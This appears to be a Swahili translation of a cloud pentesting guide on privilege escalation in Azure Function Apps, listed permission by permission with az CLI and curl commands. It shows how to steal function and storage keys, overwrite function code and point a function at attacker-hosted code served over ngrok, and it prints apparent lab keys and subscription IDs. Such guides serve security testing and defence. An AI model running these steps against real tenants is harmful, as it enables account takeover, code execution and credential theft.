Az - Functions App Privesc

Reading time: 15 minutes

Function Apps

Angalia ukurasa ufuatao kwa maelezo zaidi:

Az - Function Apps

Bucket Read/Write

Kwa ruhusa za kusoma kontena ndani ya Akaunti ya Hifadhi inayohifadhi data za kazi, inawezekana kupata kontena tofauti (za kawaida au zenye majina yaliyowekwa awali) ambayo yanaweza kuwa na msimbo unaotekelezwa na kazi.

Mara tu unapopata mahali ambapo msimbo wa kazi umehifadhiwa, ikiwa una ruhusa za kuandika juu yake, unaweza kufanya kazi itekeleze msimbo wowote na kupandisha haki kwa utambulisho unaosimamiwa ulioambatanishwa na kazi hiyo.

• File Share (WEBSITE_CONTENTAZUREFILECONNECTIONSTRING na WEBSITE_CONTENTSHARE)

Msimbo wa kazi kwa kawaida huhifadhiwa ndani ya file share. Kwa ufikiaji wa kutosha, inawezekana kubadilisha faili ya msimbo na kufanya kazi ipakue msimbo wowote ikiruhusu kupandisha haki kwa utambulisho unaosimamiwa ulioambatanishwa na Kazi.

Njia hii ya kutekeleza kawaida huweka mipangilio WEBSITE_CONTENTAZUREFILECONNECTIONSTRING na WEBSITE_CONTENTSHARE ambazo unaweza kupata kutoka

az functionapp config appsettings list \
--name <app-name> \
--resource-group <res-group>

Mikakati hiyo itakuwa na Storage Account Key ambayo Function inaweza kutumia kufikia msimbo.

Mfano ufuatao unatumia macOS kuungana na file share, lakini inapendekezwa pia kuangalia ukurasa ufuatao kwa maelezo zaidi kuhusu file shares:

Az - File Shares

# Username is the name of the storage account
# Password is the Storage Account Key

# Open the connection to the file share
# Change the code of the script like /site/wwwroot/function_app.py

open "smb://<STORAGE-ACCOUNT>.file.core.windows.net/<FILE-SHARE-NAME>"

• function-releases (WEBSITE_RUN_FROM_PACKAGE)

Ni kawaida pia kupata zip releases ndani ya folda function-releases ya kontena la Akaunti ya Hifadhi ambayo programu ya kazi inatumia katika kontena ambayo kwa kawaida inaitwa function-releases.

Kwa kawaida, njia hii ya kutekeleza itapanga config ya WEBSITE_RUN_FROM_PACKAGE katika:

az functionapp config appsettings list \
--name <app-name> \
--resource-group <res-group>

Hii config kawaida itakuwa na SAS URL ya kupakua msimbo kutoka kwa Akaunti ya Hifadhi.

• github-actions-deploy (WEBSITE_RUN_FROM_PACKAGE)

Kama ilivyo katika kesi ya awali, ikiwa usambazaji unafanywa kupitia Github Actions inawezekana kupata folda github-actions-deploy katika Akaunti ya Hifadhi inayoshikilia zip ya msimbo na SAS URL kwa zip katika mipangilio WEBSITE_RUN_FROM_PACKAGE.

• scm-releases(WEBSITE_CONTENTAZUREFILECONNECTIONSTRING na WEBSITE_CONTENTSHARE)

Kwa ruhusa za kusoma kontena ndani ya Akaunti ya Hifadhi inayohifadhi data za kazi inawezekana kupata kontena scm-releases. Ndani yake inawezekana kupata toleo la hivi karibuni katika Squashfs filesystem file format na hivyo inawezekana kusoma msimbo wa kazi:

# List containers inside the storage account of the function app
az storage container list \
--account-name <acc-name> \
--output table

# List files inside one container
az storage blob list \
--account-name <acc-name> \
--container-name <container-name> \
--output table

# Download file
az storage blob download \
--account-name <res-group> \
--container-name scm-releases \
--name scm-latest-<app-name>.zip \
--file /tmp/scm-latest-<app-name>.zip

## Even if it looks like the file is a .zip, it's a Squashfs filesystem

# Install
brew install squashfs

# List contents of the filesystem
unsquashfs -l "/tmp/scm-latest-<app-name>.zip"

# Get all the contents
mkdir /tmp/fs
unsquashfs -d /tmp/fs /tmp/scm-latest-<app-name>.zip

Ni pia inawezekana kupata funguo za master na functions zilizohifadhiwa katika akaunti ya hifadhi katika kontena azure-webjobs-secrets ndani ya folda <app-name> katika faili za JSON unazoweza kupata ndani.

# Modify code inside the script in /tmp/fs adding your code

# Generate new filesystem file
mksquashfs /tmp/fs /tmp/scm-latest-<app-name>.zip  -b 131072 -noappend

# Upload it to the blob storage
az storage blob upload \
--account-name <storage-account> \
--container-name scm-releases \
--name scm-latest-<app-name>.zip \
--file /tmp/scm-latest-<app-name>.zip \
--overwrite

Microsoft.Web/sites/host/listkeys/action

Ruhusa hii inaruhusu kuorodhesha funguo za kazi, mkuu na mfumo, lakini si funguo za mwenyeji, za kazi iliyotajwa na:

az functionapp keys list --resource-group <res_group> --name <func-name>

Kwa funguo kuu pia inawezekana kupata msimbo wa chanzo katika URL kama:

# Get "script_href" from
az rest --method GET \
--url "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.Web/sites/<app-name>/functions?api-version=2024-04-01"

# Access
curl "<script-href>?code=<master-key>"
## Python example:
curl "https://newfuncttest123.azurewebsites.net/admin/vfs/home/site/wwwroot/function_app.py?code=RByfLxj0P-4Y7308dhay6rtuonL36Ohft9GRdzS77xWBAzFu75Ol5g==" -v

Na kubadilisha kanuni inayotekelezwa katika kazi na:

# Set the code to set in the function in /tmp/function_app.py
## The following continues using the python example
curl -X PUT "https://newfuncttest123.azurewebsites.net/admin/vfs/home/site/wwwroot/function_app.py?code=RByfLxj0P-4Y7308dhay6rtuonL36Ohft9GRdzS77xWBAzFu75Ol5g==" \
--data-binary @/tmp/function_app.py \
-H "Content-Type: application/json" \
-H "If-Match: *" \
-v

Microsoft.Web/sites/functions/listKeys/action

Ruhusa hii inaruhusu kupata funguo za mwenyeji, za kazi iliyotajwa na:

az rest --method POST --uri "https://management.azure.com/subscriptions/<subsription-id>/resourceGroups/<resource-group>/providers/Microsoft.Web/sites/<func-name>/functions/<func-endpoint-name>/listKeys?api-version=2022-03-01"

Microsoft.Web/sites/host/functionKeys/write

Ruhusa hii inaruhusu kuunda/update funguo za kazi za kazi iliyoainishwa na:

az functionapp keys set --resource-group <res_group> --key-name <key-name> --key-type functionKeys --name <func-key> --key-value q_8ILAoJaSp_wxpyHzGm4RVMPDKnjM_vpEb7z123yRvjAzFuo6wkIQ==

Microsoft.Web/sites/host/masterKey/write

Ruhusa hii inaruhusu kuunda/update funguo kuu kwa kazi iliyoainishwa na:

az functionapp keys set --resource-group <res_group> --key-name <key-name> --key-type masterKey --name <func-key> --key-value q_8ILAoJaSp_wxpyHzGm4RVMPDKnjM_vpEb7z123yRvjAzFuo6wkIQ==

Microsoft.Web/sites/host/systemKeys/write

Ruhusa hii inaruhusu kuunda/update funguo za mfumo kwa kazi iliyoainishwa na:

az functionapp keys set --resource-group <res_group> --key-name <key-name> --key-type masterKey --name <func-key> --key-value q_8ILAoJaSp_wxpyHzGm4RVMPDKnjM_vpEb7z123yRvjAzFuo6wkIQ==

Microsoft.Web/sites/config/list/action

Ruhusa hii inaruhusu kupata mipangilio ya kazi. Ndani ya hizi mipangilio inaweza kuwa na uwezo wa kupata thamani za msingi AzureWebJobsStorage au WEBSITE_CONTENTAZUREFILECONNECTIONSTRING ambazo zina funguo za akaunti za kufikia uhifadhi wa blob wa kazi kwa ruhusa KAMILI.

az functionapp config appsettings list --name <func-name> --resource-group <res-group>

Zaidi ya hayo, ruhusa hii pia inaruhusu kupata SCM username and password (ikiwa imewezeshwa) kwa:

az rest --method POST \
--url "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.Web/sites/<app-name>/config/publishingcredentials/list?api-version=2018-11-01"

Microsoft.Web/sites/config/list/action, Microsoft.Web/sites/config/write

Hizi ruhusa zinaruhusu kuorodhesha thamani za config za kazi kama tulivyoona hapo awali pamoja na kubadilisha hizi thamani. Hii ni muhimu kwa sababu mipangilio hii inaonyesha mahali ambapo msimbo wa kutekeleza ndani ya kazi unapatikana.

Kwa hivyo inawezekana kuweka thamani ya mipangilio WEBSITE_RUN_FROM_PACKAGE ikielekeza kwenye URL zip faili inayoshikilia msimbo mpya wa kutekeleza ndani ya programu ya wavuti:

• Anza kwa kupata config ya sasa

az functionapp config appsettings list \
--name <app-name> \
--resource-group <res-name>

• Unda msimbo unayotaka kazi ifanye na uweke hadharani

# Write inside /tmp/web/function_app.py the code of the function
cd /tmp/web/function_app.py
zip function_app.zip function_app.py
python3 -m http.server

# Serve it using ngrok for example
ngrok http 8000

• Badilisha kazi, shika vigezo vya awali na ongeza mwishoni config WEBSITE_RUN_FROM_PACKAGE ikielekeza kwenye URL yenye zip inayoshikilia msimbo.

Mfano ufuatao ni wa mipangilio yangu mwenyewe unahitaji kubadilisha thamani kwa zako, kumbuka mwishoni thamani "WEBSITE_RUN_FROM_PACKAGE": "https://4c7d-81-33-68-77.ngrok-free.app/function_app.zip", hapa ndipo nilipokuwa nikihifadhi programu.

# Modify the function
az rest --method PUT \
--uri "https://management.azure.com/subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f/resourceGroups/Resource_Group_1/providers/Microsoft.Web/sites/newfunctiontestlatestrelease/config/appsettings?api-version=2023-01-01" \
--headers '{"Content-Type": "application/json"}' \
--body '{"properties": {"APPLICATIONINSIGHTS_CONNECTION_STRING": "InstrumentationKey=67b64ab1-a49e-4e37-9c42-ff16e07290b0;IngestionEndpoint=https://canadacentral-1.in.applicationinsights.azure.com/;LiveEndpoint=https://canadacentral.livediagnostics.monitor.azure.com/;ApplicationId=cdd211a7-9981-47e8-b3c7-44cd55d53161", "AzureWebJobsStorage": "DefaultEndpointsProtocol=https;AccountName=newfunctiontestlatestr;AccountKey=gesefrkJxIk28lccvbTnuGkGx3oZ30ngHHodTyyVQu+nAL7Kt0zWvR2wwek9Ar5eis8HpkAcOVEm+AStG8KMWA==;EndpointSuffix=core.windows.net", "FUNCTIONS_EXTENSION_VERSION": "~4", "FUNCTIONS_WORKER_RUNTIME": "python", "WEBSITE_CONTENTAZUREFILECONNECTIONSTRING": "DefaultEndpointsProtocol=https;AccountName=newfunctiontestlatestr;AccountKey=gesefrkJxIk28lccvbTnuGkGx3oZ30ngHHodTyyVQu+nAL7Kt0zWvR2wwek9Ar5eis8HpkAcOVEm+AStG8KMWA==;EndpointSuffix=core.windows.net","WEBSITE_CONTENTSHARE": "newfunctiontestlatestrelease89c1", "WEBSITE_RUN_FROM_PACKAGE": "https://4c7d-81-33-68-77.ngrok-free.app/function_app.zip"}}'

Microsoft.Web/sites/hostruntime/vfs/write

Kwa ruhusa hii ni uwezekano wa kubadilisha msimbo wa programu kupitia konsoli ya wavuti (au kupitia kiunganishi hiki cha API):

# This is a python example, so we will be overwritting function_app.py
# Store in /tmp/body the raw python code to put in the function
az rest --method PUT \
--uri "https://management.azure.com/subscriptions/<subcription-id>/resourceGroups/<res-group>/providers/Microsoft.Web/sites/<app-name>/hostruntime/admin/vfs/function_app.py?relativePath=1&api-version=2022-03-01" \
--headers '{"Content-Type": "application/json", "If-Match": "*"}' \
--body @/tmp/body

Microsoft.Web/sites/publishxml/action, (Microsoft.Web/sites/basicPublishingCredentialsPolicies/write)

Ruhusa hizi zinaruhusu kuorodhesha wasifu wote wa uchapishaji ambao kimsingi unajumuisha basic auth credentials:

# Get creds
az functionapp deployment list-publishing-profiles \
--name <app-name> \
--resource-group <res-name> \
--output json

Njia nyingine ingekuwa kuweka akreditivu zako mwenyewe na kuzitumia kwa kutumia:

az functionapp deployment user set \
--user-name DeployUser123456 g \
--password 'P@ssw0rd123!'

• Ikiwa REDACTED akauti

Ikiwa unaona kwamba akauti hizo ni REDACTED, ni kwa sababu unahitaji kuwezesha chaguo la uthibitishaji wa msingi wa SCM na kwa hiyo unahitaji ruhusa ya pili (Microsoft.Web/sites/basicPublishingCredentialsPolicies/write):

# Enable basic authentication for SCM
az rest --method PUT \
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.Web/sites/<app-name>/basicPublishingCredentialsPolicies/scm?api-version=2022-03-01" \
--body '{
"properties": {
"allow": true
}
}'

# Enable basic authentication for FTP
az rest --method PUT \
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.Web/sites/<app-name>/basicPublishingCredentialsPolicies/ftp?api-version=2022-03-01" \
--body '{
"properties": {
"allow": true
}
}

• Method SCM

Kisha, unaweza kufikia na hizi basic auth credentials to the SCM URL ya programu yako ya kazi na kupata thamani za mabadiliko ya env:

# Get settings values
curl -u '<username>:<password>' \
https://<app-name>.scm.azurewebsites.net/api/settings -v

# Deploy code to the funciton
zip function_app.zip function_app.py # Your code in function_app.py
curl -u '<username>:<password>' -X POST --data-binary "@<zip_file_path>" \
https://<app-name>.scm.azurewebsites.net/api/zipdeploy

Note that the SCM username is usually the char "$" followed by the name of the app, so: $<app-name>.

Unaweza pia kufikia ukurasa wa wavuti kutoka https://<app-name>.scm.azurewebsites.net/BasicAuth

Thamani za mipangilio zinajumuisha AccountKey ya akaunti ya hifadhi inayohifadhi data ya programu ya kazi, ikiruhusu kudhibiti akaunti hiyo ya hifadhi.

• Method FTP

Unganisha na seva ya FTP ukitumia:

# macOS install lftp
brew install lftp

# Connect using lftp
lftp -u '<username>','<password>' \
ftps://waws-prod-yq1-005dr.ftp.azurewebsites.windows.net/site/wwwroot/

# Some commands
ls # List
get ./function_app.py -o /tmp/ # Download function_app.py in /tmp
put /tmp/function_app.py -o /site/wwwroot/function_app.py # Upload file and deploy it

Kumbuka kwamba jina la mtumiaji wa FTP kawaida liko katika muundo <app-name>\$<app-name>.

Microsoft.Web/sites/hostruntime/vfs/read

Ruhusa hii inaruhusu kusoma msimbo wa chanzo wa programu kupitia VFS:

az rest --url "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.Web/sites/<app-name>/hostruntime/admin/vfs/function_app.py?relativePath=1&api-version=2022-03-01"

Microsoft.Web/sites/functions/token/action

Kwa ruhusa hii inawezekana kupata token ya admin ambayo inaweza kutumika baadaye kupata funguo kuu na hivyo kufikia na kubadilisha msimbo wa kazi.

Hata hivyo, katika ukaguzi wangu wa mwisho hakukuwa na token iliyorejeshwa, hivyo inaweza kuwa imezimwa au haitumiki tena, lakini hapa kuna jinsi unavyoweza kufanya hivyo:

# Get admin token
az rest --method GET \
--url "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.Web/sites/<app-name>/functions/admin/token?api-version=2024-04-01"

# Get master key
curl "https://<app-name>.azurewebsites.net/admin/host/systemkeys/_master" \
-H "Authorization: Bearer <token>"

Microsoft.Web/sites/config/write, (Microsoft.Web/sites/functions/properties/read)

Ruhusa hizi zinaruhusu kuwezesha kazi ambazo zinaweza kuwa zimezimwa (au kuzizima).

# Enable a disabled function
az functionapp config appsettings set \
--name <app-name> \
--resource-group <res-group> \
--settings "AzureWebJobs.http_trigger1.Disabled=false"

Inawezekana pia kuona kama kazi imewezeshwa au kuzuiliwa katika URL ifuatayo (ukitumia ruhusa iliyo katika mabano):

az rest --url "https://management.azure.com/subscriptions/<subscripntion-id>/resourceGroups/<res-group>/providers/Microsoft.Web/sites/<app-name>/functions/<func-name>/properties/state?api-version=2024-04-01"

Microsoft.Web/sites/config/write, Microsoft.Web/sites/config/list/action, (Microsoft.Web/sites/read, Microsoft.Web/sites/config/list/action, Microsoft.Web/sites/config/read)

Kwa ruhusa hizi inawezekana kubadilisha kontena linalotumiwa na programu ya kazi iliyowekwa kufanya kazi na kontena. Hii itamruhusu mshambuliaji kupakia programu ya kontena ya kazi ya azure yenye uharibifu kwenye docker hub (kwa mfano) na kufanya kazi hiyo iite.

az functionapp config container set --name <app-name> \
--resource-group <res-group> \
--image "mcr.microsoft.com/azure-functions/dotnet8-quickstart-demo:1.0"

Microsoft.Web/sites/write, Microsoft.ManagedIdentity/userAssignedIdentities/assign/action, Microsoft.App/managedEnvironments/join/action, (Microsoft.Web/sites/read, Microsoft.Web/sites/operationresults/read)

Kwa ruhusa hizi inawezekana kuunganisha utambulisho wa mtumiaji ulioendeshwa na kazi. Ikiwa kazi hiyo ilikumbwa na hatari hii itaruhusu kupandisha mamlaka kwa utambulisho wowote wa mtumiaji ulioendeshwa.

az functionapp identity assign \
--name <app-name> \
--resource-group <res-group> \
--identities /subscriptions/<subs-id>/providers/Microsoft.ManagedIdentity/userAssignedIdentities/<mi-name>

Remote Debugging

Ni uwezekano wa kuungana ili kudhibiti kazi inayotembea ya Azure kama ilivyoelezwa katika nyaraka. Hata hivyo, kwa kawaida Azure itazima chaguo hili baada ya siku 2 ikiwa mendelevu atasahau ili kuepuka kuacha usanidi dhaifu.

Ni uwezekano wa kuangalia ikiwa Kazi ina udhibiti ulioanzishwa na:

az functionapp show --name <app-name> --resource-group <res-group>

Kuwa na ruhusa Microsoft.Web/sites/config/write pia inawezekana kuweka kazi katika hali ya ufuatiliaji (amri ifuatayo pia inahitaji ruhusa Microsoft.Web/sites/config/list/action, Microsoft.Web/sites/config/Read na Microsoft.Web/sites/Read).

az functionapp config set --remote-debugging-enabled=True --name <app-name> --resource-group <res-group>

Badilisha Github repo

Nilijaribu kubadilisha Github repo ambapo kutekelezwa kunafanyika kwa kutekeleza amri zifuatazo lakini hata kama ilibadilika, msimbo mpya haukupakuliwa (labda kwa sababu inatarajia Github Action kuboresha msimbo).
Zaidi ya hayo, kitambulisho cha usimamizi wa shirikisho hakikubadilishwa kuruhusu hazina mpya, hivyo inaonekana kwamba hii si ya manufaa sana.

# Remove current
az functionapp deployment source delete \
--name funcGithub \
--resource-group Resource_Group_1

# Load new public repo
az functionapp deployment source config \
--name funcGithub \
--resource-group Resource_Group_1 \
--repo-url "https://github.com/orgname/azure_func3" \
--branch main --github-action true